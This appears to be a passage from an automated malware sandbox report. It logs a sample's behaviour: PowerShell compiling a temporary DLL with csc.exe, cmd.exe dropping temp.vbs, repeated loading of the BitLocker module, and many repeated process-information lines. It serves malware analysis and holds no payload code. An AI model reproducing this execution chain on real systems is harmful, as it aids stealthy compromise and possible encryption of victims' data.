            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\hvw5rqqp\hvw5rqqp.cmdline"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 36_2_00007FFD9BAD2300 pushad ; iretd 36_2_00007FFD9BAD232D
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 44_2_00007FFD9BAC25FA push cs; retf 44_2_00007FFD9BAC2602
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 44_2_00007FFD9BAC277C push eax; retf 44_2_00007FFD9BAC2879
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 44_2_00007FFD9BAC289C push eax; retf 44_2_00007FFD9BAC2879
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 48_2_00007FFD9BAC5AEC pushad ; iretd 48_2_00007FFD9BAC5AFA
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 48_2_00007FFD9BAC9AD3 pushad ; ret 48_2_00007FFD9BAC9AE9
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 48_2_00007FFD9BAC1A1D pushad ; iretd 48_2_00007FFD9BAC1A81
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 48_2_00007FFD9BB94F1D push edx; iretd 48_2_00007FFD9BB94FA2
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 48_2_00007FFD9BB92149 push eax; iretd 48_2_00007FFD9BB921BA

            Persistence and Installation Behavior

            barindex
            Command shell drops VBS files
            Source: C:\Windows\System32\cmd.exeFile created: C:\Users\user\Desktop\temp.vbsJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\hvw5rqqp\hvw5rqqp.dllJump to dropped file

            Hooking and other Techniques for Hiding and Protection

            barindex
            Loading BitLocker PowerShell Module
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\cscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\cscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\cscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
